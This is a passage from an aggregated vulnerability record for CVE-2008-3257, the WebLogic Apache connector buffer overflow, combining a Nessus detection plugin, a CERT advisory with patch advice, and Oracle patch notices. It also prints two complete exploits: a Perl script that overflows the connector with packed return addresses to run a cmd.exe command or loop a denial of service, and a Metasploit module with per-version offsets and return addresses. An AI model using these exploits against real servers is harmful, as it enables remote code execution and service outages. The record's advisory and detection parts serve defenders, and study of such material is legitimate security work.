fingerprint the\n # plug-in. Otherwise, we pass in a special request to \"tickle\" one.\n if (\"X-Powered-By: Servlet\" >< res[1])\n {\n res = http_send_recv3(\n method:\"POST\", \n item:url, \n port:port,\n add_headers:make_array(\"Content-Length\", \"-1\")\n );\n if (res == NULL) exit(0);\n }\n\n # If it's a bridge message from Apache...\n if (\n \"TITLE>Weblogic Bridge Message\" >< res[2] ||\n \"Failure of server APACHE bridge:</H2>\" >< res[2]\n )\n {\n build = \"\";\n change = \"\";\n\n foreach line (split(res[2], keep:FALSE))\n {\n if (\"Build date/time:\" >< line)\n {\n build = strstr(line, \"Build date/time:\") - \"Build date/time:\";\n build = ereg_replace(pattern:\"<[^>]+>\", replace:\"\", string:build);\n build = ereg_replace(pattern:\"^ +\", replace:\"\", string:build);\n }\n if (\"Change Number:\" >< line)\n {\n change = strstr(line, \"Change Number:\") - \"Change Number:\";\n change = ereg_replace(pattern:\"<[^>]+>\", replace:\"\", string:change);\n change = ereg_replace(pattern:\"^ +\", replace:\"\", string:change);\n }\n if (build && change) break;\n }\n\n if (\n build && \n (\n build =~ \"^[A-Za-z]{3} ( |[0-3])[0-9] (1[0-9]{3}|200[0-7]) \" ||\n build =~ \"^(Jan|Feb|Mar|Apr|May|Jun) ( |[0-3])[0-9] 2008 \" ||\n build =~ \"^Jul ( |[01])[0-9] 2008 \"\n )\n )\n {\n if (report_verbosity > 0)\n {\n report = string(\n \"\\n\",\n \"Nessus was able to retrieve the following information about the remote\\n\",\n \"WebLogic plug-in :\\n\",\n \"\\n\",\n \" Plug-in type : Apache\\n\"\n );\n if (build)\n {\n report = string(\n report,\n \" Build date/time : \", build, \"\\n\"\n );\n }\n if (change)\n {\n report = string(\n report,\n \" Change number : \", change, \"\\n\"\n );\n }\n if (report_verbosity > 1)\n {\n report = string(\n report,\n \"\\n\",\n \"It is configured to proxy requests such as :\\n\",\n \"\\n\",\n \" \", build_url(port:port, qs:url), \"\\n\"\n );\n }\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n }\n\n # We've found the plug-in so we're done.\n exit(0);\n }\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2016-02-01T00:11:39", "bulletinFamily": "exploit", "description": "Bea Weblogic Apache Connector Code Exec / Denial of Service Exploit. CVE-2008-3257. Remote exploit for windows platform", "modified": "2008-07-17T00:00:00", "published": "2008-07-17T00:00:00", "id": "EDB-ID:6089", "href": "https://www.exploit-db.com/exploits/6089/", "type": "exploitdb", "title": "Bea Weblogic Apache Connector - Code Execution / Denial of Service Exploit", "sourceData": "#// Bea Weblogic -- Apache Connector Remote Exploit +-1day\r\n#// Should stack break latest Windows Server 2003 <address space randomization>\r\n#// BIG THANKS TO \r\n#// \"dong-hun you\"(Xpl017Elz) in INetCop - for his paper\r\n#// \"Title: Advanced exploitation in exec-shield (Fedora Core case study)\"\r\n#// His technique works fine against Windows 2003 latest version.\r\n#//\r\n#// The code is broken, since I am chilling out for now\r\n#// SKIDDI BULLETPROOF\r\n#// You may fixup the DoS Code, Windows Code Works on English OSs\r\n#// KingCope -- July/2008\r\n\r\nuse IO::Socket;\r\nuse strict;\r\n\r\n$|=1;\r\nmy $apacheport = 80;\t#// Touch\r\n###\r\nmy $wrongusage = 0;\r\nmy $dodoshost = 0;\r\n\r\n###############################################################################\r\n### Target List Entries |Operating System and Patch Level / Kernel Version|\r\n###############################################################################\r\nmy @targets = ();\r\nmy @tgtname = ();\r\nprint \"-\" x 80;\r\n$targets[0] = \"1 Windows Server 2003 Enterprise Edition SP2 RC1 -- English\\n\";\r\n$tgtname[0] = $targets[0];\r\n$targets[100] = \"2 Denial of Service\\n\";\r\n$tgtname[100] = $targets[100];\r\n\r\n###############################################################################\r\n### Print Of Target List And Usage\r\n###############################################################################\r\nprint \"\\n\";\r\n\r\nprint \"Bea Weblogic -- Apache Connector Remote Exploit\\n\\n\";\r\nprint \"Target List:\\n\";\r\n\r\nforeach my $target (@targets) {\t\r\n\tprint $target;\r\n}\r\nprint \"\\n\\n\";\r\nprint \"-\" x 80;\r\nprint \"Usage: perl bea-unlock.pl <hostname or ip> <target>\";\r\nprint \"\\n\";\r\n\r\nprintusage:\r\nif ($wrongusage == 1) {\texit; }\r\n\r\n################################################################################\r\n### Argument Parsing\r\n################################################################################\r\nmy $host = $ARGV[0];\r\nmy $target = $ARGV[1];\r\n\r\nif (($host == \"\") || ($target == \"\")) {\r\n\t$wrongusage = 1;\r\n\tgoto printusage;\r\n}\r\n\r\n################################################################################\r\n### Setup Socket\r\n################################################################################\r\nsetupsocket:\r\nmy $sock = IO::Socket::INET->new(PeerAddr => $host,\r\n \t PeerPort => $apacheport,\r\n \t Proto => 'tcp');\r\nif ($dodoshost == 1) {\r\n\tgoto doshost;\t\r\n}\r\n################################################################################\r\n### Select Target\r\n################################################################################\r\nif ($target == 1) {\r\n\tprint \"Exploiting $host -- \" . $tgtname[$target-1];\r\n\tgoto winexpl;\r\n}\r\n\r\nif ($target == 2) {\r\n print \"Attacking Host $host -- Denial of Service -- Wait ...\\n\";\r\n\tgoto doshost;\r\n}\r\n\r\n################################################################################\r\n### Exploitation of Windows Versions\r\n################################################################################\r\nwinexpl:\r\n####WORKS [LOOKUP THE HOSTNAME]\r\nmy $command = \"echo works > c:\\\\desiredfile.txt\";\r\n\t\t\t \r\nmy $cmds = \"cmd.exe /c \\\"$command\\\"|\";\r\n\r\nmy $sc = $cmds;\r\n\r\n#### STACKBREAKING WITH WINEXEC() ON WINDOWS\r\n\r\nmy $c = \"C\" x 97 . pack(\"L\", 0x10013930) x 3 . pack(\"L\", 0x10013930) . pack(\"L\", 0x10013931) . pack(\"L\",0x77EA411E);\r\nmy $a = $cmds . \"A\" x (4000-length($cmds)) . $c;\r\n\r\nprint $sock \"POST /.jsp $a\\r\\nHost: localhost\\r\\n\\r\\n\";\r\n\r\nwhile (<$sock>) {\t\r\n\tprint;\r\n}\r\n################################################################################\r\n### Denial of Service Against The Apache Frontend Module For Bea Weblogic\r\n################################################################################\r\n####NEEDS SOME FIXUP\r\ndoshost:\r\n$dodoshost = 1;\r\n\r\nwhile(1) {\r\n\t$a = \"A\" x 6000;\r\n\tgoto setupsocket;\r\n\tprint $sock \"POST /.jsp $a\\r\\n\\r\\nHost: localhost\\r\\n\\r\\n\";\r\n\twhile(read($sock,$_,100)) {\r\n\t\tmy $dosagain = 0;\r\n\t\t\r\n\t\tif ($dosagain eq 1) {\r\n\t\t\t\t\"Server is down now\\n\";\r\n\t\t\t\texit;\r\n\t\t}\r\n\t\t\r\n\t\tif ($_ =~ /Server/) {\r\n\t\t\tprint \".\";\r\n\t\t\t$dosagain = 1;\r\n\t\t\tnext;\r\n\t\t}\r\n\t}\r\n}\r\n\r\n# milw0rm.com [2008-07-17]\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/6089/"}], "cert": [{"lastseen": "2018-12-25T20:18:28", "bulletinFamily": "info", "description": "### Overview \n\nOracle Weblogic (formerly BEA Weblogic) contains a vulnerability which can allow a remote, unauthenticated attacker to execute arbitrary code on a vulnerable system. \n\n### Description \n\nOracle Weblogic Server and Weblogic Express applicaiton servers can be integrated with the Apache webserver using the Weblogic Apache connector plugin (mod_wl). A buffer overflow exists in Weblogic Server and Weblogic Express due to the way that the Apache connector plugin handles specially crafted POST requests. According to [Oracle Security Advisory for CVE-2008-3257](<https://support.bea.com/application_content/product_portlets/securityadvisories/2793.html>):\n\n \n_The following versions of WebLogic Server and WebLogic Express are affected by this vulnerability_ \n \n_ Apache Plug-ins dated prior to July 28 2008 which implies:_ \n\n * _ WebLogic Server 10.0 released through Maintenance Pack 1, on all platforms_\n * _ WebLogic Server 9.2 released through Maintenance Pack 3, on all platforms_\n * _ WebLogic Server 9.1 on all platforms_\n * _ WebLogic Server 9.0 on all platforms_\n * _ WebLogic Server 8.1 released through Service Pack 6, on all platforms_\n * _ WebLogic Server 7.0 released through Service Pack 7 on all platforms_\n * _ WebLogic Server 6.1 released through Service Pack 7 on all platforms_ \n--- \n \n### Impact \n\nA remote, unauthenticated attacker may be able to execute arbitrary code. \n \n--- \n \n### Solution \n\n**Apply a patch**Patches have been released to address this issue. Refer to [Oracle Security Advisory for CVE-2008-3257](<https://support.bea.com/application_content/product_portlets/securityadvisories/2793.html>) for more information. \n \n--- \n \n**Reconfigure Apache** \n \nAccording to [Oracle Security Advisory for CVE-2008-3257](<https://support.bea.com/application_content/product_portlets/securityadvisories/2793.html>):\n\n_It is possible to configure Apache and avert this vulnerability by rejecting certain invalid requests. To do so, add the following parameter to the httpd.conf file and restart Apache:_ \n \n_ LimitRequestLine 4000 _ \n**Install the mod_security module** \n \nOracle suggests installing the mod_security module, which is available in open source from <http://www.modsecurity.org/>. \n \nMore information about these workarounds is provided in [Oracle Security Advisory for CVE-2008-3257](<https://support.bea.com/application_content/product_portlets/securityadvisories/2793.html>). \n--- \n \n### Vendor Information\n\n716387\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Vendor has issued information\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n__ Affected __ Unknown __ Unaffected \n\n**Javascript is disabled. Click here to view vendors.**\n\n### __ Oracle Corporation \n\nUpdated: July 29, 2008 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nRefer to [Oracle Security Advisory for CVE-2008-3257](<https://support.bea.com/application_content/product_portlets/securityadvisories/2793.html>) for more information.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23716387 Feedback>).\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | N/A | N/A \nTemporal | N/A | N/A \nEnvironmental | | N/A \n \n \n\n\n### References \n\n * <https://support.bea.com/application_content/product_portlets/securityadvisories/2793.html>\n * <http://secunia.com/advisories/31146/>\n * <http://milw0rm.com/exploits/6089>\n * <http://www.modsecurity.org/>\n\n### Credit\n\nThis vulnerabilty was reported by KingCope. \n\nThis document was written by Chris Taschner. \n\n### Other Information\n\n**CVE IDs:** | [CVE-2008-3257](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-3257>) \n---|--- \n**Severity Metric:****** | 17.33 \n**Date Public:** | 2008-07-21 \n**Date First Published:** | 2008-07-29 \n**Date Last Updated: ** | 2008-08-06 16:48 UTC \n**Document Revision: ** | 8 \n", "modified": "2008-08-06T16:48:00", "published": "2008-07-29T00:00:00", "id": "VU:716387", "href": "https://www.kb.cert.org/vuls/id/716387", "type": "cert", "title": "Oracle Weblogic Apache connector vulnerable to buffer overflow", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:23:18", "bulletinFamily": "exploit", "description": "", "modified": "2012-05-18T00:00:00", "published": "2012-05-18T00:00:00", "href": "https://packetstormsecurity.com/files/112864/Oracle-Weblogic-Apache-Connector-POST-Request-Buffer-Overflow.html", "id": "PACKETSTORM:112864", "title": "Oracle Weblogic Apache Connector POST Request Buffer Overflow", "type": "packetstorm", "sourceData": "`## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# web site for more information on licensing and terms of use. \n# http://metasploit.com/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = GreatRanking \n \nHttpFingerprint = { :pattern => [ /Apache/ ] } \n \ninclude Msf::Exploit::Remote::HttpClient \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Oracle Weblogic Apache Connector POST Request Buffer Overflow', \n'Description' => %q{ \nThis module exploits a stack based buffer overflow in the BEA \nWeblogic Apache plugin. \n \nThe connector fails to properly handle specially crafted HTTP POST \nrequests, resulting a buffer overflow due to the insecure usage \nof sprintf. Currently, this module works over Windows systems without DEP, \nand has been tested with Windows 2000 / XP. \n \nIn addition, the Weblogic Apache plugin version is fingerprinted with a POST \nrequest containing a specially crafted Transfer-Encoding header. \n}, \n'Author' => \n[ \n'KingCope', # Vulnerability Discovery and PoC \n'juan vazquez', # Metasploit Module \n], \n'Version' => '$Revision: $', \n'References' => \n[ \n[ 'CVE', '2008-3257' ], \n[ 'OSVDB', '47096' ], \n[ 'BID', '30273' ] \n], \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'process', \n}, \n'Privileged' => true, \n'Platform' => 'win', \n'Payload' => \n{ \n'Space' => 4000, \n'BadChars' => \"\\x00\\x0d\\x0a\\x3f\" \n}, \n'Targets' => \n[ \n[ 'Automatic', {} ], \n[ 'BEA WebLogic 8.1 SP6 - mod_wl_20.so / Apache 2.0 / Windows [XP/2000]', \n{ \n'Ret' => 0x10061f63, # push esp # ret # mod_wl_20.so \n'Offset' => 4102 \n} \n], \n[ 'BEA WebLogic 8.1 SP5 - mod_wl_20.so / Apache 2.0 / Windows [XP/2000]', \n{ \n'Ret' => 0x10061473, # push esp # ret # mod_wl_20.so \n'Offset' => 4102 \n} \n], \n[ 'BEA WebLogic 8.1 SP4 - mod_wl_20.so / Apache 2.0 / Windows [XP/2000]', \n{ \n'Ret' => 0x10020e31, # push esp # ret # mod_wl_20.so \n'Offset' => 4102 \n} \n] \n], \n'DisclosureDate' => 'Jul 17 2008', \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOptString.new('TARGETURI', [true, 'The URI path to a jsp or object provided by Weblogic', '/index.jsp']), \n], self.class) \n \nend \n \n \ndef check \n \nfingerprint = fingerprint_mod_wl \n \ncase fingerprint \nwhen /Version found/ \nreturn Exploit::CheckCode::Vulnerable \nwhen /BEA WebLogic connector vulnerable/ \nreturn Exploit::CheckCode::Appears \nwhen /BEA WebLogic connector undefined/ \nreturn Exploit::CheckCode::Detected \nwhen /BEA WebLogic connector no vulnerable/, /BEA WebLogic connector not found/ \nreturn Exploit::CheckCode::Safe \nend \n \nend \n \ndef exploit \n \n# Autodetect BEA mod_wl version \nmy_target = get_target \n \n# Avoid the attack if the victim doesn't have the same setup we're targeting \nif my_target.nil? \nprint_error(\"BEA mod_weblogic not supported\") \nreturn \nend \n \nuri = target_uri.path \nsploit = rand_text_alphanumeric(my_target['Offset']-uri.length) \nsploit << [my_target.ret].pack(\"V\") \nsploit << payload.encoded \n \nsend_request_cgi({ \n'method' => 'POST', \n'uri' => \"#{uri} #{sploit}\", \n}) \n \nhandler \n \nend \n \ndef get_target \n \nreturn target if target.name != 'Automatic' \n \nfingerprint = fingerprint_mod_wl \n \ncase fingerprint \nwhen /BEA WebLogic 8.1 SP6 - mod_wl_20.so/ \nreturn targets[1] \nwhen /BEA WebLogic 8.1 SP5 - mod_wl_20.so/ \nreturn targets[2] \nwhen /BEA WebLogic 8.1 SP4 - mod_wl_20.so/ \nreturn targets[3] \nelse \nreturn nil \nend \n \nend \n \ndef fingerprint_mod_wl \n \nmy_data = rand_text_alpha(rand(5) + 8) \nres = send_request_cgi( \n{ \n'method' => 'POST', \n'uri' => target_uri.path, \n'headers' => \n{ \n'Transfer-Encoding' => my_data \n}, \n'data' => \"#{my_data.length}\\r\\n#{my_data}\\r\\n0\\r\\n\", \n}) \n \nif res and res.code == 200 and res.body =~ /Weblogic Bridge Message/ \n# BEA WebLogic 8.1 SP6 - mod_wl_20.so \ncase res.body \nwhen (/Build date\\/time:<\\/B> <I>Jun 16 2006 15:14:11/ and /Change Number:<\\/B> <I>779586/) \nreturn \"Version found: BEA WebLogic 8.1 SP6 - mod_wl_20.so\" \n# BEA WebLogic 8.1 SP5 - mod_wl_20.so \nwhen (/Build date\\/time:<\\/B> <I>Aug 5 2005 11:19:57/ and /Change Number:<\\/B> <I>616810/) \nreturn \"Version found: BEA WebLogic 8.1 SP5 - mod_wl_20.so\" \nwhen (/Build date\\/time:<\\/B> <I>Oct 25 2004 09:25:23/ and /Change Number:<\\/B> <I>452998/) \nreturn \"Version found: BEA WebLogic 8.1 SP4 - mod_wl_20.so\" \n# Check for dates prior to patch release \nwhen /([A-Za-z]{3} [\\s\\d]{2} [\\d]{4})/ \nbuild_date = Date.parse($1) \nif build_date <= Date.parse(\"Jul 28 2008\") \nreturn \"BEA WebLogic connector vulnerable\" \nelse \nreturn \"BEA WebLogic connector no vulnerable\" \nend \nelse \nreturn \"BEA WebLogic connector undefined\" \nend \nend \n \nreturn \"BEA WebLogic connector not found\" \n \nend \n \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/112864/bea_weblogic_post_bof.rb.txt", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "oracle": [{"lastseen": "2018-08-31T04:14:04", "bulletinFamily": "software", "description": "A Critical Patch Update is a collection of patches for multiple security vulnerabilities. It also includes non-security fixes that are required (because of interdependencies) by those security patches. Critical Patch Updates are cumulative, except as noted below, but each advisory describes only the security fixes added since the previous Critical Patch Update. Thus, prior Critical Patch Update Advisories should be reviewed for information regarding earlier accumulated security fixes. Please refer to\n\nCritical Patch Updates and Security Alerts for information about Oracle Security Advisories.\n\nDue to the threat posed by a successful attack, Oracle strongly recommends that customers apply fixes as soon as possible. This Critical Patch Update contains 36 new security fixes across all products.\n", "modified": "2009-09-03T00:00:00", "published": "2008-10-14T00:00:00", "id": "ORACLE:CPUOCT2008-100299", "href": "", "title": "CPUOct2008 Advisory", "type": "oracle", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T04:14:01", "bulletinFamily": "software", "description": "A Critical Patch Update is a collection of patches for multiple security vulnerabilities. It also includes non-security fixes that are required (because of interdependencies) by those security patches. Critical Patch Updates are cumulative, except as noted below, but each advisory describes only the security fixes added since the previous Critical Patch Update. Thus, prior Critical Patch Update Advisories should be reviewed for information regarding earlier accumulated security fixes. Please refer to\n\nCritical Patch Updates and Security Alerts for information about Oracle Security Advisories.\n\nDue to the threat posed by a successful attack, Oracle strongly recommends that customers apply fixes as soon as possible. This Critical Patch Update contains 41 new security fixes across all products.\n", "modified": "2009-09-03T00:00:00", "published": "2009-01-13T00:00:00", "id": "ORACLE:CPUJAN2009-097901", "href": "", "title": "CPU Jan 2009", "type": "oracle", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}
